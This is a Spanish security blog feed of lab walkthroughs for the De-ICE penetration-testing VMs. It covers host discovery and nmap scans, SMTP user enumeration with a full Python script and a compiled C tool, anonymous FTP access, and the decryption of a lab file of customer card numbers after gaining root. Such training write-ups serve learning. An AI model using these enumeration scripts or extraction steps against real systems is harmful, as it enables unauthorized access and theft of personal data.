<p style="text-align: justify;">Realicemos una exploración manual al sitio web <strong>192.168.2.100</strong> en busca de información sensible o de interés para nuestros propósitos:</p>
<p style="text-align: justify;">En el sitio web podemos encontrarnos un directorio de personas involucradas con la empresa:</p>
<p style="text-align: justify;">﻿﻿<strong>Development:</strong><br />
Samuel Pickwick &#8211; pickwick@herot.net<br />
Nathaniel Winkle &#8211; winkle@herot.net<br />
Augustus Snodgrass &#8211; snodgrass@herot.net<br />
Tracy Tupman &#8211; tupman@herot.net<br />
Sam Weller &#8211; weller@herot.net<br />
Tony Weller &#8211; tweller@herot.net<br />
Estella Havisham &#8211; havisham@herot.net<br />
Abel Magwitch &#8211; magwitch@herot.net<br />
Philip Pirrip &#8211; pirrip@herot.net</p>
<p><strong>Testing:</strong><br />
Nicholas Nickleby &#8211; nickleby@herot.net<br />
Ralph Nickleby &#8211; rnickleby@herot.net<br />
Newman Noggs &#8211; noggs@herot.net<br />
Wackford Squeers &#8211; squeers@herot.net<br />
Thomas Pinch &#8211; pinch@herot.net<br />
Mark Tapley &#8211; tapley@herot.net<br />
Sarah Gamp &#8211; gamp@herot.net</p>
<p><strong>Marketing:</strong><br />
Jacob Marley &#8211; marley@herot.net<br />
Ebenezer Scrooge &#8211; scrooge@herot.net<br />
Bob Cratchit &#8211; cratchit@herot.net</p>
<p><strong>Human Resources:</strong><br />
Bill Sikes &#8211; sikes@herot.net<br />
Jack Dawkins &#8211; dawkins@herot.net<br />
Noah Claypole &#8211; claypole@herot.net</p>
<p style="text-align: justify;">Posiblemente estos sean usuarios válidos en el sistema y pueda realizarse un inicio de sesión en alguno de los servicios disponibles en el sistema.</p>
<p style="text-align: justify;">Ahora exploremos el host <strong>192.168.2.101</strong>.</p>
<p style="text-align: justify;">En este nos encontramos una serie de políticas de uso/configuración de aplicaciones/actividades relacionadas con la administración y la seguridad del servidor.</p>
<ul>
<li> Software Installation Policy</li>
<li> Server Malware Protection Policy</li>
<li> Employee Internet Use Monitoring and Filtering Policy&#8221;</li>
<li> Acceptable Use Policy</li>
<li> Audit Vulnerability Scan Policy</li>
<li> Email Policy</li>
</ul>
<p style="text-align: justify;">Tratemos entonces de autenticarnos en alguno de los servicios disponibles haciendo uso del listado de posibles usuarios con passwords comunes/blanco/mismo-nombre-usuario.</p>
<p style="text-align: justify;">Primero depuremos el listado de posibles usuarios:</p>
<p style="text-align: justify;">pickwick<br />
winkle<br />
snodgrass<br />
tupman<br />
weller<br />
tweller<br />
havisham<br />
magwitch<br />
pirrip<br />
nickleby<br />
rnickleby<br />
noggs<br />
squeers<br />
pinch<br />
tapley<br />
gamp<br />
marley<br />
scrooge<br />
cratchit<br />
sikes<br />
dawkins<br />
claypole</p>
<p style="text-align: justify;">Ahora identifiquemos y verfiquemos los usuarios reales del sistema.</p>
<p style="text-align: justify;">Para esta actividad aplicaremos una técnica mostrada en un entorno anterior, pero ahora perfeccionada por <strong>Roguer </strong>(jollyroguer [at] gmail [dot] com)  quien ha desarrollado un script en python que automatizará esa consulta. Veamos:</p>
<p style="text-align: justify;"><a href="http://pastebin.com/NQ3iDrg1" target="_blank">#usensmtp.py</a></p>
<p style="text-align: justify;">######usensmtp.py######<br />
import getpass<br />
import sys<br />
import telnetlib</p>
<p>print &#8220;Welcome to usensmtp.py&#8221;<br />
print &#8220;Created by Roguer&#8221;<br />
host = raw_input(&#8220;Digite la ip del objetivo: &#8220;)<br />
port = raw_input(&#8220;Digite el puerto del objetivo: &#8220;)<br />
users_file = raw_input(&#8220;Digite el nombre del diccionario de usuarios: &#8220;)<br />
tn = telnetlib.Telnet(host,port)<br />
tn.write(&#8220;helo x&#8221; + &#8220;\n&#8221;)<br />
tn.write(&#8220;mail from: roguer@slax.example.net&#8221; + &#8220;\n&#8221;)</p>
<p style="text-align: justify;">#este valor puede cambiar para otros entornos<br />
print tn.read_until(&#8220;Sender ok&#8221;,1)<br />
inp = open(users_file,&#8221;r&#8221;)<br />
for linea in inp.readlines():<br />
tn.write(&#8220;rcpt to: &#8220;+ linea)<br />
print tn.read_until(&#8220;User unknown&#8221;,0.1)<br />
inp.close()<br />
tn.write(&#8220;quit&#8221; + &#8220;\n&#8221;)<br />
print &#8220;created by Roguer&#8221;<br />
print &#8220;jollyroguer@gmail.com&#8221;<br />
#### fin####</p>
<p style="text-align: justify;">También podemos utilizar la herramienta <a href="http://pentestmonkey.net/tools/smtp-user-enum/" target="_blank"><strong>smtp-user-enum</strong></a> que había mostrado en el primer entorno para los propósitos de enumeración de usuarios.</p>
<p style="text-align: justify;">Los resultados arrojados por el script de Roguer son los siguientes:</p>
<p style="text-align: justify;"><strong>root@bt: ~#python usensmtp.py</strong><br />
Welcome to usensmtp.py<br />
Created by Roguer<br />
Digite la ip del objetivo: 192.168.2.100<br />
Digite el puerto del objetivo: 25<br />
Digite el nombre del diccionario de usuarios: usuarios.txt<br />
220 slax.example.net ESMTP Sendmail 8.13.7/8.13.7; Thu, 4 Mar 2010<br />
08:07:24 GMT<br />
250 slax.example.net Hello [192.168.2.10], pleased to meet you<br />
250 2.1.0 roguer@slax.example.net&#8230; Sender ok<br />
250 2.1.5 root&#8230; Recipient ok<br />
550 5.1.1 pickwick&#8230; User unknown<br />
550 5.1.1 winkle&#8230; User unknown<br />
550 5.1.1 snodgrass&#8230; User unknown<br />
550 5.1.1 tupman&#8230; User unknown<br />
550 5.1.1 weller&#8230; User unknown<br />
550 5.1.1 tweller&#8230; User unknown<br />
250 2.1.5 havisham&#8230; Recipient ok<br />
250 2.1.5 magwitch&#8230; Recipient ok<br />
250 2.1.5 pirrip&#8230; Recipient ok<br />
550 5.1.1 nickleby&#8230; User unknown<br />
550 5.1.1 rnickleby&#8230; User unknown<br />
550 5.1.1 noggs&#8230; User unknown<br />
550 5.1.1 squeers&#8230; User unknown<br />
550 5.1.1 pinch&#8230; User unknown<br />
550 5.1.1 tapley&#8230; User unknown<br />
550 5.1.1 gamp&#8230; User unknown<br />
550 5.1.1 marley&#8230; User unknown<br />
550 5.1.1 scrooge&#8230; User unknown<br />
550 5.1.1 cratchit&#8230; User unknown<br />
550 5.1.1 sikes&#8230; User unknown<br />
550 5.1.1 dawkins&#8230; User unknown<br />
550 5.1.1 claypole&#8230; User unknown<br />
550 5.1.1 spickwick&#8230; User unknown<br />
550 5.1.1 nwinkle&#8230; User unknown<br />
550 5.1.1 asnodgrass&#8230; User unknown<br />
550 5.1.1 ttupman&#8230; User unknown<br />
550 5.1.1 sweller&#8230; User unknown<br />
550 5.1.1 tweller&#8230; User unknown<br />
550 5.1.1 ehavisham&#8230; User unknown<br />
550 5.1.1 amagwitch&#8230; User unknown<br />
550 5.1.1 ppirrip&#8230; User unknown<br />
550 5.1.1 nnickleby&#8230; User unknown<br />
550 5.1.1 rnickleby&#8230; User unknown<br />
550 5.1.1 nnoggs&#8230; User unknown<br />
550 5.1.1 wsqueers&#8230; User unknown<br />
550 5.1.1 tpinch&#8230; User unknown<br />
550 5.1.1 mtapley&#8230; User unknown<br />
550 5.1.1 sgamp&#8230; User unknown<br />
550 5.1.1 jmarley&#8230; User unknown<br />
550 5.1.1 escrooge&#8230; User unknown<br />
550 5.1.1 bcratchit&#8230; User unknown<br />
550 5.1.1 bsikes&#8230; User unknown<br />
550 5.1.1 jdawkins&#8230; User unknown<br />
550 5.1.1 nclaypole&#8230; User unknown<br />
550 5.1.1 samuel&#8230; User unknown<br />
550 5.1.1 nathaniel&#8230; User unknown<br />
550 5.1.1 augustus&#8230; User unknown<br />
550 5.1.1 tracy&#8230; User unknown<br />
550 5.1.1 sam&#8230; User unknown<br />
550 5.1.1 tony&#8230; User unknown<br />
550 5.1.1 estella&#8230; User unknown<br />
550 5.1.1 abel&#8230; User unknown<br />
550 5.1.1 philip&#8230; User unknown<br />
550 5.1.1 nicholas&#8230; User unknown<br />
550 5.1.1 ralph&#8230; User unknown<br />
550 5.1.1 newman&#8230; User unknown<br />
550 5.1.1 wackford&#8230; User unknown<br />
550 5.1.1 thomas&#8230; User unknown<br />
550 5.1.1 mark&#8230; User unknown<br />
550 5.1.1 sarah&#8230; User unknown<br />
550 5.1.1 jacob&#8230; User unknown<br />
550 5.1.1 ebenezer&#8230; User unknown<br />
550 5.1.1 bob&#8230; User unknown<br />
550 5.1.1 bill&#8230; User unknown<br />
550 5.1.1 jack&#8230; User unknown<br />
550 5.1.1 noah&#8230; User unknown<br />
550 5.1.1 samuelp&#8230; User unknown<br />
550 5.1.1 nathanielw&#8230; User unknown<br />
550 5.1.1 augustuss&#8230; User unknown<br />
550 5.1.1 tracyt&#8230; User unknown<br />
550 5.1.1 samw&#8230; User unknown<br />
550 5.1.1 tonyw&#8230; User unknown<br />
550 5.1.1 estellah&#8230; User unknown<br />
550 5.1.1 abelm&#8230; User unknown<br />
550 5.1.1 philipp&#8230; User unknown<br />
550 5.1.1 nicholasn&#8230; User unknown<br />
550 5.1.1 ralphn&#8230; User unknown<br />
550 5.1.1 newmann&#8230; User unknown<br />
550 5.1.1 wackfords&#8230; User unknown<br />
550 5.1.1 thomasp&#8230; User unknown<br />
550 5.1.1 markt&#8230; User unknown<br />
550 5.1.1 sarahg&#8230; User unknown<br />
550 5.1.1 jacobm&#8230; User unknown<br />
550 5.1.1 ebenezers&#8230; User unknown<br />
550 5.1.1 bobc&#8230; User unknown<br />
550 5.1.1 bills&#8230; User unknown<br />
550 5.1.1 jackd&#8230; User unknown<br />
created by Roguer<br />
jollyroguer @ gmail.com</p>
<p style="text-align: justify;">Para quienes represente algún inconveniente ejecutar el script en python, también existe otra herramienta escrita en C que me ha resultado bastante efectiva a la hora de realizar enumeración de usuarios a través del servicio SMTP con RCPT. Veamos:</p>
<p style="text-align: justify;"><a href="http://pastebin.com/euyMrB4E" target="_blank"><strong>SMTP (RCPT TO) User enumeration</strong></a></p>
<p style="text-align: justify;">Una ves descargado/copiado como <strong>rcpt2.c</strong> (foo.c) y editado el código según nuestras necesidades, procedemos a compilarlo para generar el binario.</p>
<p style="text-align: justify;"><strong>Edición:</strong></p>
<p style="text-align: justify;">Solo necesité editar las siguientes lineas (negrita):</p>
<p style="text-align: justify;">define PORT            25<br />
#define BUFFSIZE        2048<br />
#define NAME            &#8220;rcpt2&#8243;<br />
<strong>#define HELO            &#8220;HELO Sec-Track\n&#8221;</strong><br />
<strong>#define MAIL            &#8220;mail from:&lt;sectrack@slax.example.net&gt;\n&#8221;</strong><br />
#define RCPT2           &#8220;rcpt to: &#8220;</p>
<p style="text-align: justify;"><strong>Compilación:</strong></p>
<p style="text-align: justify;">root@bt:~# gcc rcpt2.c -o user_enumeration</p>
<p style="text-align: justify;"><strong>Ejecución:</strong></p>
<p><strong>root@bt:~# ./user_enumeration</strong><br />
rcpt2 by B-r00t. (c) 2003.<br />
Usage:  ./user_enumeration &lt;USERLIST&gt; &lt;HOST&gt;<br />
./user_enumeration usernames.txt smtp.acme.com</p>
<p><strong>Resultados:</strong></p>
<p>root@bt:~# ./user_enumeration users.txt 192.168.2.100<br />
rcpt2 by B-r00t. (c) 2003.<br />
Usernames from: users.txt<br />
RCPT TO username enumeration on 192.168.2.100.</p>
<p>BANNER: 220 slax.example.net ESMTP Sendmail 8.13.7/8.13.7; Fri, 12 Mar 2010 11:35:30 GMT<br />
SEND: HELO avatar<br />
RECV: 250 slax.example.net Hello [192.168.2.1], pleased to meet you<br />
2010 11:35:30 GMT</p>
<p>SENT: mail from:&lt;avatar@slax.example.net&gt;<br />
RECV: 250 2.1.0 &lt;avatar@slax.example.net&gt;&#8230; Sender ok</p>
<p>VALID_USER: <strong>root</strong><br />
VALID_USER: <strong>havisham</strong><br />
VALID_USER: <strong>magwitch</strong><br />
VALID_USER: <strong>pirrip</strong></p>
<p>Sending RSET &amp; QUIT to 192.168.2.100</p>
<p>Ok Done!</p>
<p>Como se puede ver logramos obtener algunos de los usuarios del sistema. Estos son:</p>
<ul>
<li>root</li>
<li>havisham</li>
<li>magwitch</li>
<li>pirrip</li>
</ul>
<p>En el próximo post evaluaremos la posibilidad de autenticarnos con estos usuarios en los servicios disponibles (brute force, contraseñas débiles, etc). También trataremos de identificar vulnerabilidades en el sistema que nos permitan determinar posibles puntos de intrusión.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/desarrollo-del-entorno-de-ice-iii-%e2%80%93-enumeracion-de-usuarios/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Desarrollo del entorno De-Ice III &#8211; Network Mapping, Port Scanning</title>
		<link>http://www.sec-track.com/desarrollo-del-entorno-de-ice-iii-network-mapping-port-scanning</link>
		<comments>http://www.sec-track.com/desarrollo-del-entorno-de-ice-iii-network-mapping-port-scanning#comments</comments>
		<pubDate>Thu, 11 Mar 2010 08:48:34 +0000</pubDate>
		<dc:creator>S3cTr4ck</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[De-ICE]]></category>
		<category><![CDATA[Footprinting]]></category>
		<category><![CDATA[NetDiscover]]></category>
		<category><![CDATA[Network Mapping]]></category>
		<category><![CDATA[Nmap]]></category>
		<category><![CDATA[Penetration Test]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=469</guid>
		<description><![CDATA[Antes de comenzar con el desarrollo de este entorno virtualizado de intrusión creo que es necesario recordar sobre algunos de los objetivos generales en esta primera serie de entornos enfocados a los Test de Penetración. Objetivos Generales para los entornos De-Ice I, II, III y PwnOS También es necesario describir nuevamente el escenario propuesto para [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Antes  de comenzar con el desarrollo de este entorno virtualizado de intrusión  creo que es necesario recordar sobre algunos de los objetivos generales  en esta primera serie de entornos enfocados a los <a href="http://www.sec-track.com/test-de-penetracion" target="_blank"><strong>Test de Penetración</strong></a>.</p>
<h2 style="text-align: justify;"><a title="Permanent Link to Objetivos Generales para los entornos De-Ice I,  II, III y PwnOS" rel="bookmark" href="../objetivos-generales-para-los-entornos-de-ice-i-ii-iii-y-pwnos">Objetivos  Generales para los entornos De-Ice I, II, III y PwnOS</a></h2>
<p style="text-align: justify;">También es necesario describir nuevamente el escenario propuesto para este Test de Penetración:</p>
<h2 style="text-align: justify;"><a title="Permanent Link to De-ICE PenTest LiveCDs (Nivel  III)" rel="bookmark" href="../de-ice-pentest-livecds-nivel-iii">De-ICE PenTest LiveCDs (Nivel III)</a></h2>
<p style="text-align: justify;">El procedimiento de implementación de este entorno no varía mucho con respecto a los anteriores. Tan solo cambia la red objetivo, que para esta ocasión será la 192.168.2.*</p>
<p style="text-align: justify;">Identifiquemos los host vivos (conectados) en la red (Tool: <a href="http://www.sec-track.com/tag/netdiscover" target="_blank"><strong>Netdiscover</strong></a> incluída en <a href="http://www.sec-track.com/tag/backtrack" target="_blank"><strong>BackTrack</strong></a>):</p>
<pre style="text-align: justify;">root@bt:~# netdiscover eth0
</pre>
<pre style="text-align: justify;">3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor
 -----------------------------------------------------------------------------
 192.168.2.1     00:50:56:c0:00:07    01    060   Unknown vendor
 192.168.2.100   00:0c:29:0c:b9:e5    01    060   Unknown vendor
 192.168.2.101   00:0c:29:0c:b9:e5    01    060   Unknown vendor
 Currently scanning: 192.168.9.0/16   |   Our Mac is: 00:0c:29:ac:c4:e0 - 0
</pre>
<p style="text-align: justify;">Una vez hemos identificados los posibles host&#8217;s objetivos pasemos a escanearlos en detalle para obtener más información sobre estos.</p>
<p style="text-align: justify;">Veamos este proceso con Nmap.</p>
<p style="text-align: justify;">Escaneo y explicación enviada por Roguer (jollyroguer [at] gmail.com):</p>
<p style="text-align: justify;"><strong>root@bt: ~#nmap -sP 192.168.2.1-255</strong><br />
Starting Nmap 5.00 ( <a href="http://nmap.org/" target="_blank">http://nmap.org</a> ) at 2010-02-25 23:35 UTC<br />
Host 192.168.2.10 is up.<br />
Host 192.168.2.100 is up (0.00066s latency).<br />
MAC Address: 00:0C:29:78:57:AE (VMware)<br />
Host 192.168.2.101 is up (0.00066s latency).<br />
MAC Address: 00:0C:29:78:57:AE (VMware)<br />
Nmap done: 255 IP addresses (3 hosts up) scanned in 2.06 seconds</p>
<p style="text-align: justify;">En donde obtengo que hay 3 equipos arriba, de los cuales el .10 es mi máquina y los 100 y 101 objetivos enseguida nos centraremos en el equipo .100</p>
<p>Arranco haciendo un escaneo de puertos, como es un entorno seguro no hay necesidad de ocultar la ip de origen</p>
<p><strong>root@bt: ~#nmap -sV -T Aggressive -O 192.168.2.100</strong><br />
Starting Nmap 5.00 ( <a href="http://nmap.org/" target="_blank">http://nmap.org</a> ) at 2010-02-25 23:36 UTC<br />
Interesting ports on <a href="http://192.168.2.100/" target="_blank">192.168.2.100</a>:<br />
Not shown: 992 filtered ports<br />
PORT    STATE  SERVICE  VERSION<br />
20/tcp  closed ftp-data<br />
21/tcp  open   ftp      vsftpd 2.0.4<br />
22/tcp  open   ssh      OpenSSH 4.3 (protocol 1.99)<br />
25/tcp  open   smtp     Sendmail 8.13.7/8.13.7<br />
80/tcp  open   http     Apache httpd 2.0.55 ((Unix) PHP/5.1.2)<br />
110/tcp open   pop3     Openwall popa3d<br />
143/tcp open   imap     UW imapd 2004.357<br />
443/tcp closed https<br />
MAC Address: 00:0C:29:78:57:AE (VMware)<br />
Device type: general purpose<br />
Running: Linux 2.6.X<br />
OS details: Linux 2.6.13 &#8211; 2.6.24<br />
Network Distance: 1 hop<br />
Service Info: Host: <a href="http://slax.example.net/" target="_blank">slax.example.net</a>;  OS: Unix<br />
OS and Service detection performed. Please report any incorrect<br />
results at <a href="http://nmap.org/submit/" target="_blank">http://nmap.org/submit/</a> .<br />
Nmap done: 1 IP address (1 host up) scanned in 20.10 seconds</p>
<p style="text-align: justify;">Como podemos ver hay varios servicios corriendo en este equipo, así que vamos a tratar de obternet información como en los entornos anteriores.</p>
<p style="text-align: justify;">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p style="text-align: justify;">Realicemos un escaneo para identificar servicios y versiones en el host 192.168.2.101</p>
<p style="text-align: justify;"><strong>root@bt:~# nmap -PT80 192.168.2.101</strong></p>
<p>Starting Nmap 5.00 ( http://nmap.org ) at 2010-03-02 13:09 COT<br />
Interesting ports on 192.168.2.101:<br />
Not shown: 999 filtered ports<br />
PORT   STATE SERVICE<br />
80/tcp open  http<br />
MAC Address: 00:0C:29:0C:B9:E5 (VMware)</p>
<p style="text-align: justify;"><strong>root@bt:~# nmap -sV -p 80 192.168.2.101</strong></p>
<p>Starting Nmap 5.00 ( http://nmap.org ) at 2010-03-02 13:12 COT<br />
Interesting ports on 192.168.2.101:<br />
PORT   STATE SERVICE VERSION<br />
80/tcp open  http    Apache httpd 2.0.55 ((Unix) PHP/5.1.2)<br />
MAC Address: 00:0C:29:0C:B9:E5 (VMware)</p>
<p>Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .<br />
Nmap done: 1 IP address (1 host up) scanned in 19.28 seconds</p>
<p style="text-align: justify;">Perfecto el proceso de mapeo de red e identificación de aplicaciones y servicios en los host objetivos. En el próximo post centraremos nuestra atención a las actvidades relacionadas con la enumeración del objetivo e identificación de posibles puntos de intrusión.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/desarrollo-del-entorno-de-ice-iii-network-mapping-port-scanning/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Desarrollo del Entorno De-Ice nivel II – Información Confidencial y Backdoors</title>
		<link>http://www.sec-track.com/desarrollo-del-entorno-de-ice-nivel-ii-%e2%80%93-informacion-confidencial-y-backdoors</link>
		<comments>http://www.sec-track.com/desarrollo-del-entorno-de-ice-nivel-ii-%e2%80%93-informacion-confidencial-y-backdoors#comments</comments>
		<pubDate>Mon, 22 Feb 2010 21:37:44 +0000</pubDate>
		<dc:creator>S3cTr4ck</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Penetration Test]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=448</guid>
		<description><![CDATA[Ahora que tenemos acceso al sistema como usuarios privilegiados, procedemos a recolectar y extraer la información confidencial que exista en el sistema. Nos logueamos en el sistema: login as: bbanter bbanter@192.168.1.110’s password: Linux 2.6.16. bbanter@slax:~$ su Password: ********** root@slax:/home/bbanter# Exploremos los diferentes directorios en busca de información confidencial root@slax:/home/aadams# ls -la total 4 drwxr-xr-x 2 [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Ahora que tenemos acceso al sistema como usuarios privilegiados, procedemos a recolectar y extraer la información confidencial que exista en el sistema.</p>
<p style="text-align: justify;"><span id="more-448"></span>Nos logueamos en el sistema:</p>
<p style="text-align: justify;"><strong>login as: bbanter</strong><br />
bbanter@192.168.1.110’s password:<br />
Linux 2.6.16.<br />
bbanter@slax:~$ su<br />
Password: **********<br />
root@slax:/home/bbanter#</p>
<p style="text-align: justify;">Exploremos los diferentes directorios en busca de información confidencial</p>
<p style="text-align: justify;"><strong>root@slax:/home/aadams# ls -la</strong><br />
total 4<br />
drwxr-xr-x 2 aadams users   80 Mar 15  2007 .<br />
drwxr-xr-x 8 root   root   140 Mar 15  2007 ..<br />
-rw-r&#8211;r&#8211; 1 aadams users 3729 Feb  4  2007 .screenrc<br />
root@slax:/home/aadams# ls /home/bbanter/ -la<br />
total 4<br />
drwxr-xr-x 2 bbanter users   80 Mar 15  2007 .<br />
drwxr-xr-x 8 root    root   140 Mar 15  2007 ..<br />
-rw-r&#8211;r&#8211; 1 bbanter users 3729 Feb  4  2007 .screenrc<br />
<strong>root@slax:/home/aadams# ls /home/ccoffee/ -la</strong><br />
total 4<br />
drwxr-xr-x 2 ccoffee users   80 Mar 15  2007 .<br />
drwxr-xr-x 8 root    root   140 Mar 15  2007 ..<br />
-rw-r&#8211;r&#8211; 1 ccoffee users 3729 Feb  4  2007 .screenrc<br />
<strong>root@slax:/home/aadams# ls /home/ftp/ -la</strong><br />
total 0<br />
drwxr-xr-x 4 root   root  80 Mar 15  2007 .<br />
drwxr-xr-x 8 root   root 140 Mar 15  2007 ..<br />
drwxr-xr-x 7 aadams  513 160 Mar 15  2007 download<br />
drwxrwxrwx 2 root   root  60 Feb 26  2007 incoming<br />
<strong>root@slax:/home/aadams# ls /home/root/ -la</strong><br />
total 4<br />
drwxr-xr-x 3 aadams  513  100 Mar 15  2007 .<br />
drwxr-xr-x 8 root   root  140 Mar 15  2007 ..<br />
drwx&#8212;&#8212; 2 root   root  100 Mar 15  2007 .save<br />
-rw-r&#8211;r&#8211; 1 aadams  513 3729 Feb 27  2007 .screenrc</p>
<p style="text-align: justify;">Nos encontramos con dos archivos de interés:</p>
<p style="text-align: justify;"><strong>root@slax:/home/aadams# cd ..</strong><br />
<strong>root@slax:/home# cd root/.save/<br />
root@slax:/home/root/.save# ls -la</strong><br />
total 8<br />
drwx&#8212;&#8212; 2 root   root 100 Mar 15  2007 .<br />
drwxr-xr-x 3 aadams  513 100 Mar 15  2007 ..<br />
-r-x&#8212;&#8212; 1 root   root 198 Mar 13  2007 copy.sh<br />
-rw-r&#8211;r&#8211; 1 aadams  513 560 Mar 13  2007 customer_account.csv.enc</p>
<p style="text-align: justify;">Exploremos el contenido de estos:</p>
<p style="text-align: justify;"><strong>COPY.SH</strong></p>
<p style="text-align: justify;"><strong></strong><strong>root@slax:/home/root/.save# cat copy.sh</strong><br />
#!/bin/sh<br />
#encrypt files in ftp/incoming<br />
openssl enc -aes-256-cbc -salt -in /home/ftp/incoming/$1 -out /home/root/.save/$1.enc -pass file:/etc/ssl/certs/pw<br />
#remove old file<br />
rm /home/ftp/incoming/$1</p>
<p style="text-align: justify;">Este archivo parecía ser utilizado para cifrar los archivos contenidos en el directorio incoming del FTP con cifrado aes-256-cbc luego realiza una copia del archivo cifrado al directorio /home/root/.save haciendo uso de los certificados en /etc/ssl/certs/pw y eliminando copias anteriores.</p>
<p style="text-align: justify;">Por lo tanto por este mismo medio podemos descifrar el contenido de este archivo&#8230;</p>
<p style="text-align: justify;"><strong>root@slax:/home/root/.save# openssl enc -d -aes-256-cbc -salt -in customer_account.csv.enc -out clientes.csv -pass file:/etc/ssl/certs/pw</strong><br />
<strong>root@slax:/home/root/.save# ls</strong><br />
clientes.csv  copy.sh  customer_account.csv.enc</p>
<p style="text-align: justify;"><strong>Visualicemos el archivo:</strong></p>
<p style="text-align: justify;"><strong>root@slax:/home/root/.save# cat clientes.csv</strong><br />
&#8220;CustomerID&#8221;,&#8221;CustomerName&#8221;,&#8221;CCType&#8221;,&#8221;AccountNo&#8221;,&#8221;ExpDate&#8221;,&#8221;DelMethod&#8221;<br />
1002,&#8221;Mozart Exercise Balls Corp.&#8221;,&#8221;VISA&#8221;,&#8221;2412225132153211&#8243;,&#8221;11/09&#8243;,&#8221;SHIP&#8221;<br />
1003,&#8221;Brahms 4-Hands Pianos&#8221;,&#8221;MC&#8221;,&#8221;3513151542522415&#8243;,&#8221;07/08&#8243;,&#8221;SHIP&#8221;<br />
1004,&#8221;Strauss Blue River Drinks&#8221;,&#8221;MC&#8221;,&#8221;2514351522413214&#8243;,&#8221;02/08&#8243;,&#8221;PICKUP&#8221;<br />
1005,&#8221;Beethoven Hearing-Aid Corp.&#8221;,&#8221;VISA&#8221;,&#8221;5126391235199246&#8243;,&#8221;09/09&#8243;,&#8221;SHIP&#8221;<br />
1006,&#8221;Mendelssohn Wedding Dresses&#8221;,&#8221;MC&#8221;,&#8221;6147032541326464&#8243;,&#8221;01/10&#8243;,&#8221;PICKUP&#8221;<br />
1007,&#8221;Tchaikovsky Nut Importer and Supplies&#8221;,&#8221;VISA&#8221;,&#8221;4123214145321524&#8243;,&#8221;05/08&#8243;,&#8221;SHIP&#8221;</p>
<p style="text-align: justify;">Hemos obtenido acceso a las tarjetas de crédito de los clientes de dicho sistema objetivo&#8230;</p>
<p style="text-align: justify;">Veamos ahora como podemos implementar un backdoor en el sistema:</p>
<h2 style="text-align: justify;"><strong><a href="http://www.sec-track.com/desarrollo-del-entorno-de-ice-nivel-i-%E2%80%93-backdoors-manteniendo-el-acceso" target="_blank">Tema ya tratado en el anterior entorno</a></strong></h2>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/desarrollo-del-entorno-de-ice-nivel-ii-%e2%80%93-informacion-confidencial-y-backdoors/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Desarrollo del Entorno De-Ice nivel II – Acceso al Sistema y Elevación de Privilegios</title>
		<link>http://www.sec-track.com/desarrollo-del-entorno-de-ice-nivel-ii-%e2%80%93-acceso-al-sistema-y-elevacion-de-privilegios</link>
		<comments>http://www.sec-track.com/desarrollo-del-entorno-de-ice-nivel-ii-%e2%80%93-acceso-al-sistema-y-elevacion-de-privilegios#comments</comments>
		<pubDate>Fri, 19 Feb 2010 03:34:21 +0000</pubDate>
		<dc:creator>S3cTr4ck</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Penetration Test]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=439</guid>
		<description><![CDATA[Una vez hemos conseguido ingresar al sistema por medio del servidor FTP con acceso anónimo trataremos de elevar u obtener información sensible que nos permita cumplir con nuestro objetivo como PenTesters. Ingresemos entonces al sistema, exploremos y recolectemos información. root@bt:~/De-Ice_II# ftp 192.168.1.110 Connected to 192.168.1.110. 220 (vsFTPd 2.0.4) Name (192.168.1.110:root): anonymous 331 Please specify the [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Una vez hemos conseguido ingresar al sistema por medio del servidor FTP con acceso anónimo trataremos de elevar u obtener información sensible que nos permita cumplir con nuestro objetivo como PenTesters.</p>
<p style="text-align: justify;"><span id="more-439"></span>Ingresemos entonces al sistema, exploremos y recolectemos información.</p>
<p style="text-align: justify;"><strong>root@bt:~/De-Ice_II# ftp 192.168.1.110</strong><br />
Connected to 192.168.1.110.<br />
220 (vsFTPd 2.0.4)<br />
Name (192.168.1.110:root): anonymous<br />
331 Please specify the password.<br />
Password:<br />
230 Login successful.<br />
Remote system type is UNIX.<br />
Using binary mode to transfer files.</p>
<p style="text-align: justify;">&#8212;&#8212;&#8212;&#8212;</p>
<p style="text-align: justify;"><strong>ftp&gt; ls</strong><br />
200 PORT command successful. Consider using PASV.<br />
150 Here comes the directory listing.<br />
drwxr-xr-x    7 1000     513           160 Mar 15  2007 download<br />
drwxrwxrwx    2 0        0              60 Feb 26  2007 incoming<br />
226 Directory send OK.</p>
<p style="text-align: justify;">&#8212;&#8212;&#8212;&#8211;</p>
<p style="text-align: justify;">Exploremos lo que parece ser el directorio de descargas de copias de seguridad o migraciones descrito en el <a href="http://www.sec-track.com/de-ice-pentest-livecds-nivel-ii" target="_blank"><strong>escenario del entorno</strong></a>.</p>
<p style="text-align: justify;"><strong>ftp&gt; ls</strong><br />
200 PORT command successful. Consider using PASV.<br />
150 Here comes the directory listing.<br />
drwxr-xr-x    6 1000     513           340 Mar 15  2007 etc<br />
drwxr-xr-x    4 1000     513           100 Mar 15  2007 opt<br />
drwxr-xr-x   10 1000     513           400 Mar 15  2007 root<br />
drwxr-xr-x    5 1000     513           120 Mar 15  2007 usr<br />
drwxr-xr-x    3 1000     513            80 Mar 15  2007 var<br />
226 Directory send OK.</p>
